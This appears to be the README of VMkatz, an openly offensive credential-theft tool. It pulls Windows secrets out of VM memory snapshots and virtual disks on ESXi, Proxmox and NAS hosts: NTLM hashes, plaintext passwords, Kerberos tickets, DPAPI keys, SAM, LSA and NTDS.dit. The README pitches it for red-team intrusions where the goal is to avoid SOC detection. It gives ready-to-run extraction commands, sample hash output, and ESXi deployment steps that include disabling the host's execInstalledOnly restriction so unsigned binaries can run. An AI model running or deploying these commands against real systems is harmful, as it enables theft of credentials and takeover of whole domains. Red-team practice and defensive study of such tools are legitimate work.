Self-contained VMFS-6 parser that reads flat VMDKs directly from raw SCSI partition devices, bypassing VMFS file locks on running VMs. Key features: - Full VMFS-6 on-disk format parsing: LVM, superblock, FDC, SBC, PB/PB2 - Directory traversal with allocation map and entry bitmap support - Block map building with batched PB reads (320 reads vs 262K individual) - Sub-block resolution for small files via SBC resource metadata - Auto-scan mode: enumerates all VMs, skips non-Windows VMDKs - NTFS-only extraction for fast batch scanning Verified on ESXi 8.0 datastore: 73 VMDKs scanned in <2min, 4 Windows VMs with SAM hashes + LSA secrets + DCC2 cached credentials extracted.
VMkatz
Too Big to Steal
You are three weeks into a red team engagement. Your traffic crawls through a VPN, then bounces across four SOCKS proxies chained through compromised jump boxes before it touches the target network. Every packet takes the scenic route.
After days of lateral movement you land on a NAS attached to the virtualization cluster and the directory listing hits different: rows upon rows of .vmdk, .vmsn, .sav. Hundreds of gigabytes of virtual machines - domain controllers, admin workstations, the crown jewels - sitting right there.
But your link wheezes at 200 KB/s. Pulling a single 100 GB disk image would take six days, and every hour of sustained exfil is another chance the SOC spots the anomaly, burns your tunnel, and the whole chain collapses.
Without VMkatz, the traditional workflow looks like this: exfiltrate the entire VM disk or memory snapshot, mount it locally, install a full Windows analysis stack, load the snapshot into a debugger or use mimikatz on a booted copy, and manually piece together credentials from each VM - one at a time. Multiply that by a dozen VMs on the cluster and you are looking at days of bandwidth, tooling, and post-processing.
VMkatz exists because you shouldn't have to exfiltrate what you can read in place. It extracts Windows secrets - NTLM hashes, DPAPI master keys, Kerberos tickets, cached domain credentials, LSA secrets, NTDS.dit - directly from VM memory snapshots and virtual disks, on the NAS, the hypervisor, wherever the VM files are.
A single static binary, ~5 MB. Drop it on the ESXi host, the Proxmox node, or the NAS. Point it at a .vmsn, .vmdk, or an entire VM folder. Walk away with credentials, not disk images.
What It Extracts
From memory snapshots (LSASS)
All 9 SSP credential providers that mimikatz implements:
| Provider | Data | Notes |
|---|---|---|
| MSV1_0 | NT/LM hashes, SHA1 | Physical-scan fallback for paged entries |
| WDigest | Plaintext passwords | Linked-list walk + .data fallback |
| Kerberos | AES/RC4/DES keys, tickets (.kirbi/.ccache) |
AVL tree walk, often paged in VM snapshots |
| TsPkg | Plaintext passwords | RDP sessions only |
| DPAPI | Master key cache (GUID + decrypted key) | SHA1 masterkey for offline DPAPI decrypt |
| SSP | Plaintext credentials | SspCredentialList in msv1_0.dll |
| LiveSSP | Plaintext credentials | Requires livessp.dll (rare post-Win8) |
| Credman | Stored credentials | Hash-table + single-list enumeration |
| CloudAP | Azure AD tokens | Typically empty for local-only logon |
From virtual disks (offline)
- SAM hashes: Local account NT/LM hashes
- LSA secrets: Service account passwords, auto-logon credentials, machine account keys
- Cached domain credentials: DCC2 hashes (last N domain logons)
- NTDS.dit: Full Active Directory hash extraction from domain controller disks, natively from the ESE database - no impacket or external tools needed
Supported Inputs
| Format | Extensions | Source | Status |
|---|---|---|---|
| VMware snapshots | .vmsn + .vmem |
Workstation, ESXi | Tested |
| VirtualBox saved states | .sav |
VirtualBox | Tested |
| QEMU/KVM ELF core dumps | .elf |
virsh dump, dump-guest-memory |
Untested |
| Hyper-V memory dumps | .bin, .raw |
Legacy saved states, raw dumps | Untested, legacy only (no .vmrs) |
| VMware virtual disks | .vmdk (sparse + flat) |
Workstation, ESXi | Tested |
| VirtualBox virtual disks | .vdi |
VirtualBox | Tested |
| QEMU/KVM virtual disks | .qcow2 |
QEMU, Proxmox | Tested |
| Hyper-V virtual disks | .vhdx, .vhd |
Hyper-V | Untested |
| LVM block devices | /dev/... |
Proxmox LVM-thin, raw LVs | Tested |
| Raw registry hives | SAM, SYSTEM, SECURITY |
Exported from disk or reg save |
Tested |
| Raw NTDS.dit | ntds.dit + SYSTEM |
Copied from domain controller | Tested |
| LSASS minidump | .dmp |
--dump lsass, procdump, Task Manager |
Tested |
| VM directories | any folder | Auto-discovers all processable files | Tested |
Target OS: Windows XP SP3 through Windows Server 2025 (x86 PAE + x64, auto-detected).
Quick Start
# Build (default features: all hypervisors + disk + NTDS)
cargo build --release
# Extract LSASS credentials from a VMware snapshot
./vmkatz snapshot.vmsn
# Same, with pagefile resolution for paged-out creds
./vmkatz --disk disk.vmdk snapshot.vmsn
# Extract SAM/LSA/DCC2 from a virtual disk (auto-detected)
./vmkatz disk.vmdk
# Extract from raw registry hives (auto-detects SAM/SYSTEM/SECURITY)
./vmkatz SAM SYSTEM
./vmkatz SAM SYSTEM SECURITY
# Extract AD hashes from raw NTDS.dit + SYSTEM hive
./vmkatz ntds.dit SYSTEM
# Extract AD hashes from a domain controller disk (NTDS.dit)
./vmkatz --ntds /dev/pve/vm-102-disk-0
# Extract AD hashes with password history
./vmkatz --ntds --ntds-history dc-disk.qcow2
# Point at a VM folder and let it find everything
./vmkatz /path/to/vm-directory/
# List running processes
./vmkatz --list-processes snapshot.vmsn
# Dump LSASS as minidump (for pypykatz, etc.)
./vmkatz --dump lsass -o lsass.dmp snapshot.vmsn
# Output as hashcat-ready hashes (mode 1000)
./vmkatz --format hashcat snapshot.vmsn
# Output as NTLM pwdump format
./vmkatz --format ntlm snapshot.vmsn
# Export Kerberos tickets
./vmkatz --kirbi snapshot.vmsn # export as .kirbi files
./vmkatz --ccache snapshot.vmsn # export as .ccache file
# Parse LSASS minidump
./vmkatz lsass.dmp
# Degraded extraction from truncated/partial memory
./vmkatz --carve partial-snapshot.vmsn
# Show all sessions including empty ones
./vmkatz --all snapshot.vmsn
Output Formats
| Format | Flag | Description |
|---|---|---|
text |
--format text (default) |
Full credential dump with session metadata |
ntlm |
--format ntlm |
DOMAIN\user:::hash::: pwdump format |
hashcat |
--format hashcat |
Raw hashes: mode 1000 (NTLM), mode 2100 (DCC2) |
csv |
--format csv |
Machine-readable, all fields |
In text mode, well-known blank password hashes (31d6cfe0... for NTLM, aad3b435... for LM) are annotated with (blank).
Use --color auto|always|never to control colored terminal output (default: auto, detects TTY). Colors highlight usernames, section headers, interesting hashes, and plaintext passwords.
Example Output
LSASS extraction (default text)
$ vmkatz snapshot.vmsn
[*] Providers: MSV(ok) WDigest(ok) Kerberos(paged) TsPkg(empty) DPAPI(ok) SSP(empty) LiveSSP(n/a) Credman(empty) CloudAP(paged)
[+] 8 logon session(s), 3 with credentials:
LUID: 0x3e7 (SYSTEM)
Username: YOURPC$
Domain: WORKGROUP
[DPAPI]
GUID : 94e9f320-d4a0-4737-b34e-ab106f485c0e
MasterKey : d0f110675ca73f39d1370bdfd...
SHA1 MasterKey: ea72698de207dab9e01fd9ab63f322ae82b4a4bb
LUID: 0x240be
Session: 2 | LogonType: Unknown
Username: user
Domain: YOURPC
LogonServer: YOURPC
SID: S-1-5-21-4247878743-2693906039-1959858616-1000
[MSV1_0]
NT Hash : bbf7d1528afa8b0fdd40a5b2531bbb6d
SHA1 : 6ed12f1e60b17cfff120d753029314748b58aa05
DPAPI : 6ed12f1e60b17cfff120d753029314748b58aa05
Hashcat mode
$ vmkatz --format hashcat snapshot.vmsn
[*] Providers: MSV(ok) WDigest(ok) ...
bbf7d1528afa8b0fdd40a5b2531bbb6d
NTDS.dit extraction
$ vmkatz --ntds /dev/pve/vm-102-disk-0
[+] NTDS Artifacts:
Partition offset : 0x100000
ntds.dit size : 20971520 bytes
SYSTEM size : 14155776 bytes
Bootkey : 9ae365ba5244457bfc2a26187a28346a
Hashes extracted : 18
[+] AD NTLM Hashes:
RID: 500 Administrator current NT:c66d72021a2d4744409969a581a1705e
RID: 502 krbtgt current NT:9c238cafb7b4447e5f701c71dbdcf636
RID: 1000 vagrant current NT:e02bc503339d51f71d913c245d35b50b
...
Pagefile resolution
$ vmkatz --disk disk.vmdk snapshot.vmsn
[+] Pagefile: 320.0 MB
[*] Providers: MSV(ok) WDigest(ok) ...
[+] File-backed: 12540 DLL pages resolved from disk
[+] Pagefile: 2274 pages resolved from disk
Pagefile Resolution
Memory snapshots only capture physical RAM. Credentials that were paged to disk at snapshot time appear as (paged out). The --disk flag reads pagefile.sys from the VM's virtual disk to resolve these.
In directory mode, this happens automatically: VMkatz discovers both the snapshot and the disk image, and resolves paged memory without manual flags.
Deployment on ESXi
VMkatz compiles to a static musl binary that runs directly on ESXi without dependencies:
# Cross-compile for ESXi (musl static)
cargo build --release --target x86_64-unknown-linux-musl
# Upload (~5 MB)
scp target/x86_64-unknown-linux-musl/release/vmkatz root@esxi:/tmp/
# On ESXi 8.0+, allow non-VIB binaries (requires once)
esxcli system settings advanced set -o /User/execInstalledOnly -i 0
# Extract from a live VM snapshot
/tmp/vmkatz /vmfs/volumes/datastore1/MyVM/MyVM-Snapshot1.vmsn
# Extract SAM from a powered-off VM disk
/tmp/vmkatz /vmfs/volumes/datastore1/MyVM/MyVM-flat.vmdk
Build Features
VMkatz is modular. Features can be enabled/disabled at compile time:
| Feature | Description | Default |
|---|---|---|
vmware |
VMware .vmsn/.vmem snapshot support |
Yes |
vbox |
VirtualBox .sav saved-state support |
Yes |
qemu |
QEMU/KVM ELF core dump support | Yes |
hyperv |
Hyper-V .bin/.raw dump support |
Yes |
sam |
Disk extraction (SAM/LSA/DCC2) and disk format handlers | Yes |
ntds.dit |
NTDS.dit AD extraction (--ntds, --ntds-history). Requires sam |
Yes |
carve |
Degraded extraction from partial/truncated memory (--carve) |
Yes |
dump |
Process memory dump as minidump (--dump) |
Yes |
# Full build with everything (default)
cargo build --release
# Minimal VMware-only build (no carve, no dump, no disk)
cargo build --release --no-default-features --features vmware
# Memory extraction only (all hypervisors, no disk/carve/dump)
cargo build --release --no-default-features --features "vmware vbox qemu hyperv"
# Disk-only build (SAM + NTDS, no memory snapshot support)
cargo build --release --no-default-features --features "sam ntds.dit"
# Memory + carve (no dump, no disk)
cargo build --release --no-default-features --features "vmware vbox qemu hyperv carve"
Module Architecture
src/
├── main.rs CLI dispatch, format detection, output formatting
├── lib.rs Crate root — feature-gated module declarations
├── error.rs VmkatzError type (thiserror + anyhow)
├── memory/
│ └── reader.rs PhysicalMemory and VirtualMemory traits
├── pe.rs PE header parser (exports, sections, data directories)
├── minidump.rs MDMP parser — VirtualMemory trait over minidump regions
├── discover.rs Directory/recursive auto-discovery of VM files
├── paging/
│ ├── mod.rs 4-level x64 page table walker (CR3 → PTE)
│ ├── pae.rs 3-level PAE page table walker (pre-Vista x86)
│ ├── ept.rs Extended Page Table scanner (VBS/nested Hyper-V)
│ └── pagefile.rs Pagefile.sys fault resolution from disk
├── windows/
│ ├── process.rs EPROCESS discovery (System process, process enumeration)
│ └── offsets.rs EPROCESS offset tables (Win7 → Win11 24H2, x64 + x86 PAE)
├── lsass/
│ ├── finder.rs Main extraction orchestrator (PhysicalMemory + minidump paths)
│ ├── crypto.rs LSASS decryption (AES-CBC, 3DES-CBC, DES-X-CBC, RC4)
│ ├── patterns.rs Signature patterns for crypto key discovery in DLL sections
│ ├── types.rs Credential, LogonSession, DpapiCredential structs
│ ├── msv.rs MSV1_0 provider (NT/LM/SHA1 hashes)
│ ├── wdigest.rs WDigest provider (plaintext passwords)
│ ├── kerberos.rs Kerberos provider (tickets, passwords)
│ ├── tspkg.rs TsPkg provider (RDP plaintext)
│ ├── dpapi.rs DPAPI provider (master key cache)
│ ├── ssp.rs SSP provider (plaintext credentials)
│ ├── livessp.rs LiveSSP provider (plaintext, rare post-Win8)
│ ├── credman.rs Credential Manager (stored credentials)
│ ├── cloudap.rs CloudAP provider (Azure AD tokens)
│ └── carve.rs [feature: carve] Degraded extraction for partial memory
├── dump.rs [feature: dump] Process memory → minidump writer
├── vmware/ [feature: vmware] VMware .vmsn/.vmem/.vmss layer
├── vbox/ [feature: vbox] VirtualBox .sav layer
├── qemu/ [feature: qemu] QEMU ELF core dump layer
├── hyperv/ [feature: hyperv] Hyper-V .bin/.raw layer
├── sam/ [feature: sam] SAM/LSA/DCC2 + disk format handlers
│ ├── mod.rs Orchestration, types, bootkey extraction
│ ├── partition.rs MBR/GPT partition table parser
│ ├── ntfs_reader.rs NTFS MFT walker (SAM/SYSTEM/SECURITY hive discovery)
│ ├── disk_fallbacks.rs Fallback hive search for non-standard layouts
│ └── vmdk_scan.rs Sparse VMDK descriptor + extent parser
└── ntds/ [feature: ntds.dit] NTDS.dit ESE database parser
├── mod.rs ESE page/B+ tree traversal, PEK decryption, hash extraction
└── ese.rs JET Blue database primitives (pages, tags, columns)
Tested Targets
Tested across 7 Windows versions and 4 hypervisors.
| Hypervisor | Guest OS | Artifact | Result | Notes |
|---|---|---|---|---|
| VMware Workstation | Windows 10 22H2 x64 | LSASS (.vmsn) |
PASS | 3 snapshots |
| VMware Workstation | Windows 10 22H2 x64 | LSASS + pagefile (.vmsn + .vmdk) |
PASS | Resolves paged-out credentials |
| VMware Workstation | Windows 10 22H2 x64 | SAM / LSA / DCC2 (.vmdk) |
PASS | |
| VMware Workstation | Windows 10 22H2 x64 | Folder mode | PASS | Auto-discovers .vmsn + .vmdk |
| VirtualBox | Windows 10 22H2 x64 | LSASS (.sav) |
PASS | |
| VirtualBox | Windows 10 22H2 x64 | LSASS + pagefile (.sav + .vdi) |
PASS | |
| VirtualBox | Windows 10 22H2 x64 | SAM / LSA / DCC2 (.vdi) |
PASS | |
| ESXi 8.0 | Windows 7 SP1 x64 | LSASS (.vmsn) |
PASS | |
| ESXi 8.0 | Windows 10 22H2 x64 | LSASS (.vmsn) |
PASS | 2 VMs |
| ESXi 8.0 | Windows Server 2012 x64 | LSASS (.vmsn) |
PASS | 2 VMs |
| ESXi 8.0 | Windows Server 2016 x64 | LSASS (.vmsn) |
PASS | 3 VMs |
| ESXi 8.0 | Windows Server 2019 x64 | LSASS (.vmsn) |
PASS | |
| ESXi 8.0 | Windows 11 x64 | LSASS (.vmsn) |
PASS | 2 VMs, no VBS |
| ESXi 8.0 | Windows 11 x64 | SAM (flat .vmdk) |
PASS | Powered-off VM |
| ESXi 8.0 | Windows 11 x64 (VBS) | LSASS (.vmsn) |
FAIL | Credential Guard / VBS |
| Proxmox 8 | Windows Server 2016 x64 | SAM / LSA / DCC2 (LVM block device) | PASS | Live + stopped VMs |
| Proxmox 8 | Windows Server 2019 x64 | SAM / LSA / DCC2 (LVM block device) | PASS | 3 VMs, incl. DCs |
| Proxmox 8 | Windows Server 2019 x64 | NTDS.dit (LVM block device) | PASS | 3 DCs (GOAD lab), 8KB pages, verified against impacket |
| Proxmox 8 | Windows Server 2025 x64 | SAM / LSA (LVM block device) | PASS | |
| Proxmox 8 | Windows Server 2025 x64 | NTDS.dit (LVM block device) | PASS | 32KB pages, native ESE parsing |
| Proxmox 8 | Windows 11 x64 | SAM / LSA (LVM block device) | PASS | Live VM |
Known limitations
- VBS / Credential Guard: VMs with Virtualization-Based Security enabled use nested Hyper-V page tables. The VMEM captured by ESXi is 99% zero pages because the actual kernel memory is behind Hyper-V's SLAT. An EPT walker is implemented but cannot yet recover credentials from these VMs. SAM extraction from the virtual disk still works when the VM is powered off.
- Kerberos: Kerberos credentials are frequently paged out in VM snapshots. The provider reports
pagedbut the data is legitimately absent from RAM. Pagefile resolution (--disk) can recover some entries. - Hyper-V: Only legacy memory dumps (
.bin,.raw) are supported via identity-mapped reading. Modern Hyper-V 2016+ saved states (.vmrs) use a proprietary undocumented format requiring Microsoft'svmsavedstatedumpprovider.dlland are not supported. VHDX/VHD disk extraction is implemented but untested. QEMU/KVM ELF core dumps are implemented but also untested. - x86 (32-bit) guests: Partial support — WinXP SP3 and Win2003 SP2 (x86 PAE) are supported for LSASS extraction. Later 32-bit versions (Vista/Win7 x86) are not yet supported.
How It Works
-
Layer: Opens the VM snapshot format and exposes guest physical memory as a flat address space. Each hypervisor format (VMware regions, VBox page map, QEMU ELF segments, Hyper-V identity map) is abstracted behind a common
PhysicalMemorytrait. -
Process discovery: Scans physical memory for EPROCESS structures using signature matching (
System\0at ImageFileName offset) with auto-detection across 13 known offset tables (WinXP SP3 through Win11 24H2, x86 PAE + x64). -
Page table walking: Translates virtual addresses to physical using the kernel DTB (CR3). Supports 4-level x64 page tables and 3-level PAE (pre-Vista x86). TLB cache (256-entry direct-mapped), large pages (2MB/1GB), PCID bits, and pagefile fault resolution.
-
LSASS extraction: Locates
lsass.exe, maps its virtual address space, finds DLLs (lsasrv.dll,msv1_0.dll,wdigest.dll,kerberos.dll,dpapisrv.dll, etc.) via PEB/LDR enumeration, resolves crypto keys via pattern matching on.text/.datasections, and decrypts credentials in-memory using 3DES-CBC, AES-CBC, AES-CFB, DES-X-CBC, or RC4 (auto-detected by buffer alignment and OS version). Also works on LSASS minidumps (.dmp). -
Disk extraction: Parses the virtual disk container (sparse VMDK, VDI, QCOW2, VHDX, VHD), finds the Windows partition (MBR/GPT), walks NTFS MFT to locate
SAM,SYSTEM,SECURITYhives, and decrypts hashes using the boot key. -
NTDS extraction: For domain controllers (
--ntds), locatesNTDS.ditand theSYSTEMhive on disk, then parses the ESE (JET Blue) database natively. Traverses B+ trees to read thedatatable, extracts the PEK (Password Encryption Key) using the bootkey, and decrypts NT/LM hashes for every AD account. Supports both 8KB pages (Windows Server 2019 and earlier) and 32KB large pages (Windows Server 2025), as well as RC4 (legacy), AES pre-Win2016, and AES Win2016+ (v0x13) hash blob formats.
Acknowledgements
- mimikatz by Benjamin Delpy (@gentilkiwi) -- the definitive reference for LSASS internals and Windows credential decryption.
- pypykatz by Tamás Jós (@skelsec) -- pure Python mimikatz reimplementation, used as cross-reference for SAM/LSA/DCC2 extraction.
- Impacket by Fortra (originally Alberto Solino @agsolino) -- reference implementation for NTDS.dit extraction and the pwdump output format.
- Vergilius Project -- documented Windows kernel structures used to verify EPROCESS field offsets across all supported builds (XP through Win11 24H2).